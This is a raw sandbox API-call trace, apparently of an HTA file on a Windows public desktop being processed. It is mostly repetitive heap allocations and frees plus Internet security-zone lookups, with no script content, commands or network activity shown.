RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x56) returned 0x5511a0 [0226.667] IInternetSecurityManager:GetSecurityId (in: This=0x55cbb0, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14f0f8, pcbSecurityId=0x14f0f4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14f0f8*=0x66, pcbSecurityId=0x14f0f4*=0x9) returned 0x0 [0226.667] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14f0f8, pcbSecurityId=0x14f0f4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14f0f8*=0x0, pcbSecurityId=0x14f0f4*=0x200) returned 0x800c0011 [0226.667] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5511a0 | out: hHeap=0x510000) returned 1 [0226.667] IUnknown:AddRef (This=0x53c65c) returned 0x3 [0226.667] IUri:GetPropertyDWORD (in: This=0x53c65c, uriProp=0x11, pdwProperty=0x14ee6c, dwFlags=0x0 | out: pdwProperty=0x14ee6c*=0x9) returned 0x0 [0226.667] IUnknown:Release (This=0x53c65c) returned 0x2 [0226.667] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x56) returned 0x5511a0 [0226.667] IInternetSecurityManager:GetSecurityId (in: This=0x55cbb0, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14eec8, pcbSecurityId=0x14eec4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14eec8*=0x66, pcbSecurityId=0x14eec4*=0x9) returned 0x0 [0226.667] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14eec8, pcbSecurityId=0x14eec4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14eec8*=0x0, pcbSecurityId=0x14eec4*=0x200) returned 0x800c0011 [0226.667] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5511a0 | out: hHeap=0x510000) returned 1 [0226.667] IUnknown:AddRef (This=0x53c65c) returned 0x3 [0226.667] IUri:GetPropertyDWORD (in: This=0x53c65c, uriProp=0x11, pdwProperty=0x14f09c, dwFlags=0x0 | out: pdwProperty=0x14f09c*=0x9) returned 0x0 [0226.667] IUnknown:Release (This=0x53c65c) returned 0x2 [0226.667] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x56) returned 0x5511a0 [0226.667] IInternetSecurityManager:GetSecurityId (in: This=0x55cbb0, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14f0f8, pcbSecurityId=0x14f0f4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14f0f8*=0x66, pcbSecurityId=0x14f0f4*=0x9) returned 0x0 [0226.667] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14f0f8, pcbSecurityId=0x14f0f4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14f0f8*=0x0, pcbSecurityId=0x14f0f4*=0x200) returned 0x800c0011 [0226.667] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5511a0 | out: hHeap=0x510000) returned 1 [0226.667] IUnknown:AddRef (This=0x53c4ac) returned 0xc [0226.668] IUri:GetPropertyDWORD (in: This=0x53c4ac, uriProp=0x11, pdwProperty=0x14ee6c, dwFlags=0x0 | out: pdwProperty=0x14ee6c*=0x9) returned 0x0 [0226.668] IUnknown:Release (This=0x53c4ac) returned 0xb [0226.668] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x56) returned 0x5511a0 [0226.668] IInternetSecurityManager:GetSecurityId (in: This=0x55cbb0, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14eec8, pcbSecurityId=0x14eec4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14eec8*=0x66, pcbSecurityId=0x14eec4*=0x9) returned 0x0 [0226.668] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14eec8, pcbSecurityId=0x14eec4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14eec8*=0x0, pcbSecurityId=0x14eec4*=0x200) returned 0x800c0011 [0226.668] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5511a0 | out: hHeap=0x510000) returned 1 [0226.810] IUnknown:Release (This=0x5205b0) returned 0x1 [0226.810] IUnknown:Release (This=0x53c4ac) returned 0xa [0226.810] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x541ac8 | out: hHeap=0x510000) returned 1 [0226.810] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.810] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.810] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.810] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.810] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5336b8 | out: hHeap=0x510000) returned 1 [0226.811] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54dee0 | out: hHeap=0x510000) returned 1 [0226.811] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x554810 | out: hHeap=0x510000) returned 1 [0226.811] GetCurrentThreadId () returned 0xc4 [0226.811] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x544498 | out: hHeap=0x510000) returned 1 [0226.811] GetCurrentThreadId () returned 0xc4 [0226.811] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.811] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.811] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.811] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.811] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.811] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.811] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54de88 | out: hHeap=0x510000) returned 1 [0226.811] ValidateRect (hWnd=0x2016c, lpRect=0x0) returned 1 [0226.811] IUnknown:AddRef (This=0x53c65c) returned 0x3 [0226.811] IUri:GetPropertyDWORD (in: This=0x53c65c, uriProp=0x11, pdwProperty=0x14f09c, dwFlags=0x0 | out: pdwProperty=0x14f09c*=0x9) returned 0x0 [0226.811] IUnknown:Release (This=0x53c65c) returned 0x2 [0226.811] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x56) returned 0x550a20 [0226.811] IInternetSecurityManager:GetSecurityId (in: This=0x55cbb0, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14f100, pcbSecurityId=0x14f0fc*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14f100*=0x66, pcbSecurityId=0x14f0fc*=0x9) returned 0x0 [0226.811] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/users/public/desktop/info.hta", pbSecurityId=0x14f100, pcbSecurityId=0x14f0fc*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14f100*=0x0, pcbSecurityId=0x14f0fc*=0x200) returned 0x800c0011 [0226.811] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x550a20 | out: hHeap=0x510000) returned 1 [0226.811] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x53b588 | out: hHeap=0x510000) returned 1 [0226.811] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x9) returned 0x53b588 [0226.811] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.811] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x5220c0 | out: hHeap=0x510000) returned 1 [0226.811] GetTickCount () returned 0x209cf [0226.811] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] CoTaskMemAlloc (cb=0x6d) returned 0x54a928 [0226.812] CoTaskMemAlloc (cb=0x9) returned 0x5847c0 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x541960 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54b5f8 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x533458 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x533438 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54efc8 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x524090 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x533498 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x541988 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54b610 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.812] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.813] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54b628 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.814] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x54b5c8 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0226.815] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 